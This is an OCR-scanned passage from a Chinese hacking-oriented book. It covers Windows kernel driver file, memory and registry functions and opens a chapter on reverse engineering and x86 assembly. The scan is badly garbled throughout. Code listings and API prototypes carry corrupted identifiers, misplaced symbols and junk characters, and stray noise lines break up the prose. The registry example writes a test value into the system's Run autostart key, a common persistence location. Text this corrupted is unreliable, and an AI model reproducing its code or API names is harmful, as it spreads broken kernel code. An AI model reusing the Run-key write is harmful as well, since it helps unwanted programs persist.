0.00004163 OQpenFile Successfully |! 

0. 80005280 1s Directory 0 

0.000095286 Zw¥riteFile Successfully | 
0. 80010560 FileSize = 10 

0.00011845 ZwReadFile Successfully ! 
0.00012320 EEC 


Er 





图 4-5 文件 读 写 驱动 的 调试 输出 信息 


该 文件 读 写 程序 相对 于 前 面 章 节 的 代码 来 说 ， 算 是 比较 长 的 ， 不 过 它 毕 竟 只 是 一 个 简单 
的 文件 读 写 程序 。 下 面 将 对 其 中 使 用 的 内 核 函 数 进行 介绍 。 


4.2.2 内核 下 文件 读 写 函数 介绍 


该 文件 读 写 程序 分 为 4 个 函数 ， 分 别 是 DriverUnload()、DriverEntry()、CreateFileTest() 
和 OpenFileTestD)。 这 4 个 函数 的 功能 非常 明确 ，DriverUnload(0 是 一 个 生 载 例 程 ，DriverEntry0) 
是 驱动 程序 的 入 口 ，CreateFileTest() 是 用 来 新 建文 件 的 ，OpenFileTest0 是 用 来 打开 已 建立 文 
件 并 进行 读 写 的 函数 。 

DriverUnload() 和 DriverEntry() 这 两 个 函数 ， 在 前 面 的 内 容 中 己 经 有 所 介绍 。 下 面 主 要 对 
CreateFileTest() 和 OpenFileTest(0) 进 行 介绍 。 

1. 文件 的 创建 、 打 开 与 关闭 

对 于 文件 的 创建 或 打开 , 在 内 核 驱动 中 都 是 通过 内 核 函 数 ZwCreateFile() 进 行 操作 的 。 和 
Win32 API 类 似 ， 会 通过 参数 接收 返回 的 文件 句柄 。 它 的 返回 值 是 一 个 操作 是 否 成 功 的 状态 
码 。ZwCreateFile() 函 数 的 定义 如 下 : 


NTSTATUS 
ZwCreateFilel 
_out PHANDLE FileHandle, 
_ in ACCESS MASK DesiredAccess, 
_ in POBJECT ATTRIBUTES ObjectAttributes, 
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utpPrIOlSTNTUSBLOCK | TostatusBlocky 
,in opt, PLARGE -TNTEGER AllocationSize, 
in ULONG FileAttributes, 

in ULONG ShareAccess, 

in ULONG CreateDisposition, 

in'ULONG CreateOptions, 

dnuopt PVOTD, Eapuffer, 

in ULONG EaLength 


jE 
参数 介绍 如 下 。 

FileHandle: 用 来 接收 创建 文件 后 的 文件 句柄 。 

DesiredAccess: 打开 文件 操作 的 描述 ， 读 或 写 ， 一 般 指定 为 GENERIC READ 或 
GENERIC WRITE; 该 参数 和 CreateFile() 函 数 中 的 参数 相同 。 

ObjectAttributes: 指向 OBJECT_ATTRIBUTES 结构 体 的 指针 ,该 结构 体 包含 要 创建 或 打 
开 的 文件 名 。 

IoStatusBlock: 指向 IO_STATUS BLOCK 结构 体 的 指针 ， 该 结构 体 用 于 接收 操作 结果 的 

AllocationSize: 该 参数 指向 一 个 64 位 的 整数 ， 用 于 文件 初始 化 分 配 时 的 大 小 。 

FileAttributes: 通常 为 FILE_ ATITRIBUTE NORMAL， 该 参数 和 CreateFile() 函 数 中 的 参 
数 相 同 。 

ShareAccess: 指定 文件 的 共享 方式 ， 可 以 指定 为 FILE_ SHARE READ、 FILE SHARE 
WRITE 或 FILE SHARE DELETE， 该 参数 和 CreateFile() 函 数 中 的 参数 相同 。 

CreateDisposition: 描述 本 次 调用 ZwCreateFile() 函 数 的 意图 ， 可 以 指定 为 FILE_CREATE、 
FILE OPEN、FILE_OPEN _IF 等 。 

.CreateOptions: 通常 指定 为 FILE SYNCHRONOUS IO NONALERT， 表 示 文 件 是 同步 
操作 ， 比 如 在 写 入 文件 时 ， 调 用 ZwWriteFile() 函 数 ， 在 ZwWriteFile() 调 用 返回 时 ， 文 件 写 操 
作 已 经 完成 。 

EaBuffer: 该 参数 表示 一 个 指针 ， 指 向 可 选 的 扩展 属性 区 ， 一 般 为 NULL。 

EaLength: 该 参数 表示 扩展 属性 区 的 长 度 ， 一 般 为 0。 

ZwCreateFile() 函 数 的 第 3 个 参数 是 一 个 指向 OBJECT_ATTRIBUTES 的 结构 体 ， 该 结构 
体 的 定义 如 下 : 


typeder stract OBIn CT ATTRIBUTRS MM 
ULONG Length; 
HANDLE RoobpDireotioryy 
PUNICODE, STRING ObjectName; 
ULONG Attributes,; 
PRVOTID SecurityDeseriptor; 
PVOID SecurityQualityOfService; 
} OBJECT TDERTRUTRES “POBJECT ATTRTBUTES,; 
typbedef CONST QBUECTL ATTRIBUTES POOBIECT ATTRIBUTESS? 


该 结构 体 通常 不 需要 用 户 逐 个 进行 初始 化 ， 而 是 使 用 InitializeObjectAttributes() 函 数 进行 
初始 化 ， 该 函数 的 定义 如 下 : 


VOID 
InitializeObijecttAttributest( 
OUT POBJECT ATTRIBUTES TnitializedAttributes, 
IN PUNICODE STRING ObjectName, 
IN ULONG Attributes, 
IN HANDLE RootDirectory, 








4.2 ”内核 下 的 文件 操作 





IN PSECURITY DESCRIPTOR SecurityDescriptor 
) 


从 InitializeObjectAttributes() 函 数 的 定义 可 以 看 出 ， 其 参数 与 OBJECT _ATTRIBUTES 结 
构 体 的 成 员 变量 相同 。InitializeObjectAttributes() 函 数 的 参数 说 明 如 下 。 

InitializeAttributes: 指向 OBJECT_ATTRIBUTES 结构 体 的 指针 。 

ObjectName: 对 象 名 称 ， 用 UNICODE STRING 描述 ， 对 于 ZwCreateFile() 函 数 而 言 ， 
该 处 指定 为 文件 名 。 

Attributes: 一 般 设置 为 OBJ CASE INSENSITIVE， 意 味 着 名 字 字 符 串 不 区 分 大 小 写 。 

RootDirectory: 一 般 设 置 为 NULL。 

SecurityDescriptor: 用 于 设置 安全 描述 符 ， 一 般 设置 为 NULL。 

ObjectName 必须 使 用 UNICODE _ STRING 类 型 进行 描述 ，UNICODE STRING 是 内 核对 
宽 字 符 串 封装 的 一 种 数据 结构 ， 该 结构 体 的 定义 如 下 : 


typedef struct _UNICODE .STRING { 
USHORT Lengthy 
USHORT MaximumLength; 
PWSTR” Buffer; 

} UNICODE STRING, *PUNICODE STRING; 


结构 体 成 员 说 明 如 下 。 

Length: 字符 串 的 参数 ， 单 位 是 字 节 ， 如 果 是 N 个 字符 ， 那 么 Length 的 值 为 N 个 字符 
的 2 倍 。 

MaximumLength: 整个 字符 缓冲 区 的 最 大 长 度 ， 单 位 是 字 节 。 

Buffer: 缓冲 区 的 指针 。 

对 于 UNICODE_STRING 类 型 的 字符 串 ， 通 过 KdPrint(0) 也 可 以 进行 调试 输出 ， 输 出 的 方 
式 类 似 如 下 : 


UNICODE STRING uniString; 
KdPprint (("SwZ2", &uniString)); 


UNICODE _STRING 类 型 的 字符 串 在 使 用 前 需要 进行 初始 化 ， 初 始 化 的 方法 有 两 种 : 一 
种 是 使 用 内 核 函数 RtlInitUnicodeString() 进 行 初始 化 , 另 一 种 方式 是 自行 申请 内 存 空间 来 进行 
初始 化 。 通 常情 况 下 都 是 用 第 1 种 方法 。RtlInitUnicodeString() 函 数 的 定义 如 下 : 


VOID 
RtliInitUnicodeString'( 
IN OUT PUNICODE STRING DestinationSstring, 
| PCWSTR SourceString 
参数 说 明 如 下 。 
DestinationString: 要 初始 化 的 UNICODE_STRING 字符 串 的 指针 。 
SourceString: 字符 串 的 内 容 。 
在 为 InitializeObjectAttributes() 函 数 传 递 第 2 个 参数 时 ， 需 要 指定 的 文件 名 是 一 个 符号 链 
接 。 在 应 用 层 下 ， 描 述 一 个 文件 的 完整 路 径 是 “ciWNa.txt” 而 在 内 核 下 ， 描 述 的 方式 为 
“\N??Nc:Natxt”。 符 号 链接 在 内 核 模 式 下 以 “\?2N”( 或 者 是 “\DosDevices\”) 开头 ; 在 用 户 
模式 下 使 用 符号 链接 ， 则 以 “\NN2” 开 头 。 
关于 文件 创建 的 函数 就 介绍 完了 ,是 不 是 觉得 内 容 比 较 多 ? 除了 ZwCreateFile0 以 外 , 还 
介绍 了 InitializeObjectAttributes() 和 RtlInitUnicodeString() 两 个 内 核 函 数 。 而 后 两 个 函数 是 比较 
常用 的 ， 在 后 面 介绍 注册 表 操 作 时 同样 会 用 到 。 
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上 面 介绍 的 ZwCreateFile() 函 数 不 但 可 以 创建 文件 , 还 可 以 打开 文件 。 但 是 由 于 它 的 参数 
过 于 繁多 ， 因 此 内 核 函 数 中 专门 提供 了 一 个 用 于 进行 文件 打开 的 函数 ZwOpenFile()， 其 定义 
如 下 : 


NTSTATUS 
2ZwOPenEile( 
OUT PHANDLE FileHandile, 
IN ACCESS MASK DesiredAccess, 
IN POBJECT ATTRIBUTES ObjectAttributes, 
OUT PIO.STATUS BLOCK IoStatusBlock, 
IN ULONG ShareAccess, 
IN ULONG OpenOptions 
2 
ZwOpenFile() 函 数 相 当 于 一 个 只 用 来 打开 文件 的 精简 版 的 ZwCreateFile() 函 数 ， 其 各 参数 
使 用 方法 与 ZwCreateFile() 函 数 相同 ， 这 里 不 重复 介绍 。 


文件 句柄 的 关闭 使 用 内 核 函 数 ZwClose()， 其 定义 如 下 : 
NTSTATUS ZwClose (IN HANDLE Handle); 
该 函数 只 包含 一 个 参数 ， 即 被 打开 文件 的 句柄 。 该 函数 除了 可 以 关闭 文件 句柄 以 外 ， 还 
可 以 关闭 其 它 类 型 资源 的 句柄 ， 比 如 注册 表 句 柄 等 。 
2. 文件 的 相关 操作 
文件 相关 的 操作 主要 介绍 4 个 内 核 函 数 ， 分 别 是 ZwReadFile()、ZwWriteFile()、 
ZwQueryInformationFile() 和 ZwSetInformationFile()。 例 子 代码 中 实现 了 对 文件 的 读 写 操作 ， 
判断 打开 的 文件 是 否 为 目录 ， 获 取 文 件 的 长 度 和 设置 文件 的 指针 。 
首先 来 看 ZwQueryInformationFile() 和 ZwSetInformationFile() 两 个 函数 的 定义 。ZwQueryIn 
formationFileO) 函 数 的 定义 如 下 : 
NTSTATUS 
ZwQueryInformationFile!l 
IN HANDLE FileHandle, 
OUT BIO STATUS BLOCK IoStatusBlock, 
OUT PVOID FilelInformation, 
IN ULONG Length, 
IN FILE INFORMATION CLASS FilelInformationClass 
i 
参数 说 明 如 下 。 
FileHandle: 被 打开 的 文件 句柄 。 
IoStatusBlock: 返回 设置 的 状态 。 
FileInformation: 依据 FileInformationClass 的 不 同 而 不 同 。 
Length: FileInformation 数据 的 长 度 。 
FileInformationClass: 描述 需 获 取 的 属性 类 型 。 
ZwSetInformationFile() 函 数 的 定义 如 下 : 


NTSTATUS 
ZwSetIinformationFile'l 

IN HANDLE FileHandle, 

OUT PIO, STATUS BLOCK IostatusBlock, 

IN PVOID FileInformation, 

IN ULONG Length, 
IN FILE INFORMATION CLASS FileInformationClass 
Miz 


ZwSetInformationFile() 函 数 的 参数 与 ZwQueryInformationFile() 函 数 的 参数 几乎 相同 ， 但 
是 两 个 函数 的 第 3 个 参数 稍 有 差别 ， 差 别 在 于 对 ZwQueryInformationFile() 来 说 是 一 个 输出 参 
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数 ， 对 于 ZwSetInformationFile() 来 说 是 一 个 输入 参数 。 这 里 一 定 要 注意 。 

对 于 ZwQueryInformationFile() 和 ZwSetInformationFile() 这 两 个 函数 来 说 ， 第 5 个 参数 决 
定 了 要 读 取 或 设置 的 属性 的 类 型 ， 第 3 个 参数 根据 第 5 个 参数 来 接受 或 传递 相应 的 值 。 

两 个 函数 的 第 5 个 参数 的 常用 值 有 3 种 类 型 ， 分 别 是 FileStandardInformation、FileBasic 
Information 和 FilePositionInformation。 每 种 类 型 分 别 又 对 应 不 同 的 结构 体 ， 这 些 结构 体 则 是 
被 ZwQueryInformationFile0 和 ZwSetInformationFileO) 函 数 的 第 3 个 参数 所 用 。 


FileStandardInformation 对 应 的 结构 体 定义 如 下 : 

typedef struct FILE STANDARD INFORMATION ( 

LARGE INTEGER AllocationSize; // 为 文件 分 配 的 大 小 《占用 族 所 需 大 小 ) 
LARGE INTEGER EndofFiley; // 距离 文件 结尾 的 字 节 数 

ULONG NumberOfLinks; A/ 有 多 少 个 链接 文件 

BOOLEAN DeletePpending; // 是 否 准备 删除 

BOOLEAN Directory; 必 ， 泛 得 为 外 录 

FILE STANDARD INFORMATION, *PFILE, STANDARD INFORMATION; 


FileBasicInformation 对 应 的 结构 体 定义 如 下 : 
typeder Struct FILE BASIC INFORMATION { | 
LARGE _ INTEGER CreationTime; // 文件 创建 时 间 
LARGF INTEGER LastAccessTime; // 最 后 访问 时 间 
LARGE INTEGER LastWriteTime; /7 最 后 写 入 时 间 
LARGE INTEGER ChangeTime; // 修改 时 间 

ULONG FileAttributes; /7X 文件 属性 

FILE BASIC INFORMATION, *PFILE BASIC INFORMATION; 


FilePositionInformation 对 应 的 结构 体 定义 如 下 : 
typedef struct FILE POSTITION INFORMATION 1 
LARGE INTEGER CurrentByteOffset; // 当前 文件 指针 位 置 

} FILE POSITION INFORMATION, *PFILE POSITION INFORMATION; 

明白 了 第 3 个 参数 和 第 5 个 参数 以 后 ， 就 可 以 清楚 第 4 个 参数 的 取 值 了 ， 该 取 值 是 第 3 
个 参数 的 大 小 。 

上 面 的 结构 体 中 大 量 使 用 了 _ LARGE INTEGER 的 数据 类 型 ， 它 其 实 是 一 个 联合 体 。 
LARGE INTEGER 的 定义 如 下 : 


typedef union LARGE INTEGER { 
SE 4 
ULONG LowPart; 
LONG Highpart; 





位 订 站 忆 地 疝 芝 圣明 狂 山上 小 


Er 


— 








4 
已 寿光 C 本 全 
ULONG LowPart; 
LONG HighPart; 
ba 
LONGLONG Quadpart,; 
} LARGE INTEGER? 


该 结构 体 主要 是 用 来 表示 64 位 的 整数 类 型 ， 通 常 使 用 其 QuadPart 成 员 。 
ZwReadFile0 函 数 的 定义 如 下 : 


NTSTATUS 
ZwReadFilel( 
IN HANDLE FileHandle, 
IN HANDLE Event OPTIONAL, 
IN PIOQ.APC ROUTINE ApcRoutine QPTIONAL, 
IN PVOID ApcContext QOQPTIONAL, 
OUT PIO'STATUS BLOCK ToSstatusBlock, 
QUT PYOID Buffery 
IN ULONG Length, 
IN PLARGE INTEGER ByteOffset, OPTIONAL, 
IN PULONG Key "OPTIONBAL 
) 
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参数 说 明 如 下 。 

FileHandle: 打开 文件 的 句柄 。 

Event: 用 于 异步 完成 读 取 时 ， 一 般 设 置 为 NULL。 

ApcRoutine: 回调 例 程 ， 用 于 异步 完成 读 取 时 ， 一 般 设置 为 NULL。 
ApcContext: 一 般 设 置 为 NULL。 

IoStatusBlock: 指向 IO_STATUS_BLOCK 的 指针 ， 记 录 读 取 操 作 的 状态 ，IoStatusBlock. 
Information 用 于 记录 读 取 的 字 节 数 。 

Buffer: 保存 读 取 文件 内 容 的 缓冲 区 。 

Length: 准备 读 取 文 件 内 容 的 字 节 数 。 

ByteOffset 指定 读 取 内 容 的 偏 移 地 址 。 

Key: 读 取 文件 时 的 附加 信息 ， 一 般 设 置 为 NULL。 
ZwWriteFile() 函 数 的 定义 如 下 : 


NTSTATUS 
ZwWriteFilel 

IN HANDLE FileHandle, 

IN HANDLE ‘Event OPTIONAL, 

IN PIO APC ROUTINE ApcRoutine OPTIONAL, 

IN PVOID! ApcContext’ OPTIONADL, 

OUT PIO STATUS. BLOCK IoStatusBlock, 

TN PVOITD (Batfferwy 

IN ULONG | Length, 

IN, PLARGE ITNTEGER ,ByteOffset OPPIONAL, 
IN PULONG Key,, OPTIONAL 
) 二 


该 函数 的 参数 类 似 于 ZwReadFile() 函 数 ，Buffer 中 保存 的 是 欲 写 入 文件 内 容 的 缓冲 区 。 

3. 内 存 管理 函数 

文件 读 写 代码 中 用 到 了 3 个 内 存 相 关 的 内 核 函 数 ， 分 别 是 ExAllocatePool()、RtlFillMem 
ory() 和 ExFreePool()。 

ExAllocatePoolO) 函 数 用 于 申请 一 块 内 存 空间 ， 其 定义 如 下 : 


PVOID 
ExAllocatePool ( 
EN POOETYPE PooOLTLTYDe, 
IN SIZE T NumberQOfBytes 
Wh 
参数 说 明 如 下 。 
PoolType: 该 参数 是 一 个 枚 举 值 ， 常 用 的 值 有 两 个 分别 是 NonPagedPool 和 PagedPool; 
前 者 表示 非 分 页 内 存 ， 而 后 者 表示 分 页 内 存 ; 永远 不 会 被 交换 到 文件 中 的 虚拟 内 存 称 为 非 分 
页 内 存 ， 可 以 被 交换 到 文件 中 的 虚拟 内 存 称 为 分 页 内 存 。( 关 于 具体 虚拟 内 存 的 知识 ， 请 参考 
操作 系统 原理 或 设计 相关 的 书籍 。) 
NumberOfBytes: 表示 需要 分 配 的 内 存 大 小 。 
该 函数 的 返回 值 是 一 个 内 存 地 址 。 
RtlFillIMemory() 函 数 用 于 填充 内 存 ， 其 定义 如 下 : 
WE 


RtlFillMemory'! 
IN VOID UNALIGNED, *Destination, 
LNISTZDUTE| Lendgth; 
LN IUCRHAR I El 
jm 





中 
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参数 说 明 如 下 。 

Desination: 填充 内 存 地 址 的 起 始 位 置 。 

Length: 填充 的 长 度 。 

Fill: 需要 填充 的 字 节 。 

ExFreePool() 函 数 用 于 回收 ExAllocatePool() 申 请 的 内 存 空间 ， 其 定义 如 下 : 


VOID ExFreePool (IN PVOID P); 

该 函数 只 有 一 个 参数 ， 是 指向 ExAllocatePool() 函 数 分 配 内 存 空间 的 指针 。 

本 节 详 细 介绍 了 上 一 节 关 于 内 核 中 文件 读 写 程序 中 用 到 的 所 有 的 内 核 函数 ， 本 节 并 没有 过 多 
的 新 的 内 容 ， 无 非 也 打开 文件 、 读 写 文件 等 操作 ， 只 是 调用 的 函数 使 用 了 WDK 提供 的 函数 ， 请 
读者 参照 代码 来 理解 本 节 所 学 的 内 核 函数 的 使 用 方法 ， 从 而 掌握 内 核 中 关于 文件 的 读 写 操作 。 


4.3 内核 下 的 注 


在 内 核 中 不 能 调用 用 户 层 的 Win32 API 函数 来 进行 注册 表 相 关 的 操作 ， 而 必须 使 用 内 核 
层 提供 的 对 注册 表 操 作 相 关 的 内 核 函 数 。 本 节 通 过 一 个 简单 的 对 注册 表 读 写 的 例子 ， 介 绍 对 
注册 表 操 作 的 内 核 函数 。 


4.3.1 内 核 下 注册 表 的 读 写 程序 


在 内 核 中 对 注册 表 的 操作 无 法 使 用 Win32 API 函数 ， 这 点 与 内 核 中 的 文件 操作 相同 。 因 
此 ， 需 要 使 用 内 核 相关 的 函数 来 对 注册 表 进 行 操作 。 先 来 看 关于 注册 表 操 作 的 程序 ， 再 具体 
介绍 内 核 中 操作 注册 表 的 函数 。 

注册 表 的 读 写 程序 代码 如 下 : 


#include <ntddk.h> 
#define REG PATH L"\\Registry\\Machine\\Software\\Microsoft\\Windows\\CurrentVersion\\run\\" 





VOID DriverUnload(PDRIVER OBJECT pDriverObiject) 
{ 
} 


VOID CreateKey() 

{ 
UNICODE STRING uniRegPath; 
OBJECT ATTRIBUTES objAttributes; 
NTSTATUS nSstatus; 
HANDLE hRegistry; 
ULONG ulResult; 


RtlInitUnicodeString (guniRegPath, REG PATH); 
InitializeObjectAttributes (&objAttributes, 
suniRegPathy 
OBJ CRSE_INSENSITIVE， 
NULL, 
NULL); 


// 创建 注册 表 项 

nstatus = ZwCreateKey (ghRegistry, 
KEY ALE, ACCESS, 
&objAttributes, 
0 
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NULL, 
REG OPTION NON VOLATILE, 
&ulResult); 


EN NDSUOCESS (nS tatusy 
{ 
KdPrint(("ZwCreateKey Successfully ! \r\n")); 
} 
else 
{ 
KdPrint (I("ZwCreateKey Dnsucoessfullyl! NENnM)).; 
} 


// 关闭 注册 表 句 柄 
2wClose(hRegistry);» 
} 


VOID QueryAndSsetKey (HANDLE hRegistry) 
UNICODE STRING uniValueName; 
NTSTATUS, nStatus; 
PWCHAR pValue = L"test"; 
PKEY VALUE PARTIAL INFORMATION pKeyValuePartialClass’; 
ULONG ulResult; 


RtllinitUnicodestring (guniVvalueName, LEest")s 


// 添加 注册 表 键 值 
nSstatus = ZwSetValueKey (hRegistry, 
&uniValueNanme, 


pValue, 
wcslen(pValue) * 2 + Sizeof (WCHAR)); 


4 NDSUCOnSS (nStatusy) 从 
{ 
KdPrint( ("ZwSetValueKey Successfully ! \r\n")); 
} 
else 
{ 
KdPrint(("ZwSetValueKey Unsuccessfully 1 NENn7") ) ， 
} 


// 查询 注册 表 项 

nstatus = ZwOuUeryValueKey (hRegistry, 
&univalueName, 
KeyValuePartiallInformation, 
加 
NULL, 
&ulResult)’; 





// STATUS_BUFFER_TOO_SMALL 表示 缓冲 区 太 小 
if ( nstatus =="STATUS BUFFER TOO, SMALL || ulResult != 0 ) 
{ 
pKeyValuePartialClass = ExAllocatePool (PagedPool, ulResult); 
nstatus = /ZwQueryValueKey (hRegistry; 
guniValueName, 
KeyValuePartiallnformation, 
pKeyValuePartialClass, 
ulRestlt, 
&ulResult); 


KdPrint (("%S \r\n", pReyValuePartialClass—>Data)); 


ExFreePool (pKeyValuePartialClass); 
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将 上 面 的 代码 在 控制 台 下 进行 编译 连接 ， 然 后 用 KMD 进行 加 载 ， 在 DbgView 中 观察 驱 
动 的 调试 输出 ， 如 图 4-6 所 示 。 


ZwCreatekey Successfully | 
verikey Successfully 二 
ZwSetyalteKey Successfully ! 

test 


"We 


图 4-6 注册 表 读 写 驱动 的 调试 输出 信息 
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注册 表 读 写 的 程序 与 文件 读 写 的 程序 非常 类 似 ， 下 面 将 介绍 代码 中 用 到 的 函数 的 用 法 。 
4.3.2 内 核 下 注册 表 读 写 函 数 的 介绍 


内 核 下 注册 表 的 操作 分 两 部 分 进行 介绍 ， 分 别 是 注册 表 的 创建 与 打开 、 注 册 表 的 读 写 操作 。 

1. 注册 表 的 创建 与 打开 

注册 表 的 创建 与 打开 类 似 于 文件 的 创建 与 打开 ， 分 别 是 ZwCreateKey0 和 ZwOpenKey() 
函数 。ZwCreateKey() 函 数 的 定义 如 下 : 


NTSTATUS 
ZwCreateKey ( 
OUT PHANDLE KeyHandle, 
IN ACCESS MASK DesiredAccess, 
IN POBJECT ATTRIBUTES ObjectaAttributes, 
IN ULONG TitleIndex, 
LN PUNLOODE STRING Class OFTIONAL, 
IN ULONG CreateOptions, 
OUT BULONG Disposition OPTIONAL 
Das 


参数 说 明 如 下 。 

KeyHandle: 获得 的 注册 表 句 柄 。 

DesiredAccess: 访问 权限 ， 一 般 设 置 为 KEY ALL ACCESS 。 

ObjectAttributes: 指向 OBJECT _ATTRIBUTES 结构 体 的 指针 ， 用 于 保存 要 创建 的 
子 键 。 

TitleIndex: 一 般 设 置 为 0。 

Class: 一 般 设置 为 NULL。 

CreateOptions: 创建 时 的 选项 ， 一 般 设 置 为 REG_OPTION NON_VOLATILE。 

Disposition: 返回 是 创建 成 功 还 是 打开 成 功 。 

ZwCreateKey() 函 数 的 参数 非常 多 ， 如 果 仅 是 为 了 打开 注册 表 而 传递 这 么 多 的 参数 ， 实 在 
有 些 辛苦 。Windows 内 核 驱 动 为 程序 员 提 供 了 更 为 简便 的 打开 注册 表 的 函数 ZwOpenKey(，, 其 
定义 如 下 : 


NTSTATUS 
ZwOpenKey( 
OUT PHANDLE KeyHandle, 
IN ACCESS MASK DesiredAccess, 
IN POBJECT ATTRIBUTES ObjectAttributes 
) . 


参数 说 明 如 下 。 

KeyHandle: 返回 被 打开 的 句柄 。 

DesiredAccess: 打开 的 权限 ， 一 般 设 为 KEY ALL _ ACCESS。 

ObjectAttributes: 指向 OBJECT _ATITRIBUTES 结构 体 的 指针 。 

在 OBJECT _ ATTRIBUTES 结构 体 中 要 指定 打开 的 子 键 ， 这 里 与 在 应 用 层 下 的 表示 方式 
有 所 不 同 。 比 如 欲 打 开 HKEY LOCAL MACHINE， 则 应 指定 为 \Registry\Machine; 欲 打开 
HKEY USER， 则 应 指定 为 \Registry\User。 而 HKEY CLASSES ROOT 和 HKEY CURR 
ENT_USER 在 内 核 中 没有 对 应 的 表示 方式 。 

2. 注册 表 相 关 操作 

内 核 下 注册 表 操 作 的 函数 在 例子 程序 中 使 用 了 两 个 ， 分 别 是 ZwSetValueKey0 和 ZwQuery 








外 





4.3 内 核 下 的 注册 表 操 作 





ValueKey(O) 函 数 。 
ZwSetValueKey() 函 数 的 定义 如 下 : 


NTSTATUS 
2wSetValueKey\( 
IN HANDLE KeyHandle, 
IN PUNICODE STRING ValueName, 
IN ULONG Titlelindex QPTIONAL, 
IN ULONG Type; 
IN PVOID Data, 
IN ULONG DataSize 
); 


参数 说 明 如 下 。 

KeyHandle: 注册 表 句 柄 。 

ValueName: 要 新 建 或 修改 的 键 名 。 

TitleIndex: 一 般 设置 为 0。 

Type: 键 值 的 类 型 ， 比 如 REG SZ、REG DWORD、REG _ MULTI SZ 等 。 
Data: 写 入 键 值 的 值 。 

DataSize: 记录 数据 的 大 小 。 

ZwQueryValueKey() 函 数 的 定义 如 下 : 


NTSTATUS 
ZwQueryValueKey( 
IN HANDLE KeyHandle, 
IN PUNICODE STRING ValueName, 
IN KEY VALUE INFORMATION CLASS KeyValueInformationClass, 
OUT PVOID KeyValueInformation, 
IN ULONG Length, 
OUT PULONG ResultLength 
); 


参数 说 明 如 下 。 

KeyHandle: 打开 的 注册 表 句 柄 。 

ValueName: 要 查询 的 键 名 。 

KeyValueInformationClass: 选择 一 种 查询 类 别 ， 可 以 是 KeyValueBasicInformation、 
KeyValueFullInformation 或 者 KeyValuePartialInformation 。 

KeyValueInformation: 根据 KeyValueInformation 的 不 同 ， 选 择 不 同 的 查询 类 别 。 

Length: 要 查 数据 的 长 度 。 

ResultLength: 实际 查询 数据 的 长 度 。 

返回 值 判断 查询 是 否 成 功 , 如 果 返 回 值 为 STATUS _ BUFFER _ TOO_ SMALL, 而 ResultLength 
又 不 为 0 值 ， 那 么 表示 缓冲 区 较 小 。 这 时 需要 根据 ResultLength 中 的 值 重 新 开辟 较 大 的 缓冲 
区 空间 。 

在 代码 中 , 第 3 个 参数 传递 的 是 KeyValuePartialInformation， 其 对 应 的 数据 结构 是 KEY_ 


VALUE PARTIAL INFORMATION， 该 数据 结构 的 定义 如 下 : 
typedef struct _KEY VALUE PARTIAL TINFORMATION { 
ULONG TitleIndex; 


ULONG ‘Type; // 数据 的 类 型 
ULONG DataLength; // 数据 的 长 度 
UCHAR Datal[l1]; // 数据 的 指针 


} KEY VALUE PARTIAL TINFORMATION, *PKEY VALUE PARTIAL INFORMATION; 


数据 结构 中 ，Data[1] 定 义 的 是 有 一 个 长 度 的 无 符号 字符 型 的 数组 ， 该 数组 通过 越界 访问 











全 膝 着 忆 起 沿革 于 员 狂 贡 上 浊 





中 








”第 4 章 黑客 内 核 驱 动 开 发 基础 








变 长 的 无 符号 字符 串 。 通 过 定义 一 个 长 度 字符 数组 来 越界 访问 变 长 字符 串 是 很 多 数据 结构 的 


六 惯用 做 法 。 
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驱 本 章 简单 介绍 了 关于 内 核 驱 动 编程 的 基础 知识 。 作 为 后 面 章 节 的 一 个 铺垫 ， 关 于 内 核 编 
有 程 的 知识 在 后 面 的 章节 仍然 会 涉及 。 更 多 更 详细 的 关于 内 核 驱动 的 开发 ， 请 读者 参考 具体 的 
发 | 教程 。 
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和 第 rc 章 ， 黑 客 逆 回 基础 


逆向 , 是 指 逆向 工程 。 所 谓 的 逆向 工程 是 什么 呢 ? 下 面 引 用 某 软 件 工程 书籍 中 的 一 段 话 : 
“术语 “逆向 工程 ” 源 自 于 硬件 领域 ， 是 一 种 通过 对 产品 的 实际 样本 进行 检查 分 析 ， 得 出 一 个 
或 多 个 关于 这 个 产品 的 设计 和 制造 规格 的 活动 。 软 件 的 逆向 工程 与 此 类 似 ， 通 过 对 程序 的 分 
析 ， 导 出 更 高 抽象 层次 的 表示 ， 如 从 现存 的 程序 中 抽取 数据 、 体 系 结构 、 过 程 的 设计 信息 等 ， 
是 一 个 设计 恢复 的 过 程 。” 

对 于 黑客 来 说 , 主要 是 通过 反 汇 编 或 调试 等 手段 来 分 析 软 件 , 小 到 软件 的 某 个 技术 实现 ， 
大 到 软件 的 框架 结构 。 逆 向 工程 在 计算 机 领域 的 应 用 面 非常 广泛 ， 除 了 人 们 熟悉 的 软件 破解 
外 ， 还 包括 (不 限于 ) 对 恶意 软件 的 研究 、 对 加 密 算法 的 研究 、 对 软件 保护 技术 的 研究 、 对 
二 进 制 代码 的 审计 、 研 究 同类 型 的 竞争 软件 技术 等 。 

逆向 的 应 用 如 此 之 广 ， 但 是 其 基础 知识 不 外 乎 几 个 方面 : 调试 工具 、 道 向 分 析 工 具 、 汇 
编 语言 、 高 级 语言 和 高 级 语言 生成 的 二 进 制 代 码 所 对 应 的 反 汇编 代码 。 本 章 由 汇编 语言 开始 
逐步 介绍 逆向 相关 的 基础 知识 。 


5.1 x86 汇编 语言 介绍 


读者 想 在 逆向 方面 有 一 定 发 展 的 话 ， 最 好 买 一 本 汇编 语言 的 书籍 来 进行 学 习 。 现 在 计算 
机 专业 毕业 的 学 生 都 学 过 汇编 语言 ， 但 是 大 部 分 人 认为 学 的 只 是 Intel 8086 下 的 汇编 指令 ， 
枯燥 、 乏 味 、 不 具备 实用 性 。 其 实 ， 作 为 汇编 语言 的 入 门 ， 学 习 8086 的 汇编 指令 已 经 基本 足 
够 了 。 目 前 的 硬件 都 是 x86 兼容 架构 的 ， 无 论 多 复杂 的 程序 ， 最 终 都 将 成 为 x86 指令 。 作 为 
逆向 的 入 门 ， 只 要 掌握 8086 的 常用 指令 、 寄 存 器 的 用 法 、 堆 栈 的 概念 和 数据 在 内 存 中 存储 的 
顺序 基本 就 可 以 了 。 

对 于 入 门 ， 有 以 上 知识 就 是 够 了 。 如 果 想 要 有 深入 的 发 展 ， 对 于 汇编 语言 的 学 习 还 是 要 
深入 研究 。 本 章 站 在 道 向 工程 入 门 的 起 点 ， 抛 开 各 种 原理 及 理论 知识 ， 只 简单 讲述 x86 常用 
的 汇编 指令 的 用 法 。 


5.1.1 寄存 器 


任何 程序 的 执行 ， 归 根 结 底 ， 都 是 存放 在 存储 器 里 的 指令 序列 执行 的 结果 。 寄 存 器 用 来 
存放 程序 运行 中 的 各 种 信息 ， 包 括 操作 数 地 址 、 操 作 数 及 运算 的 中 间 结 果 等 。 下 面 来 熟悉 各 
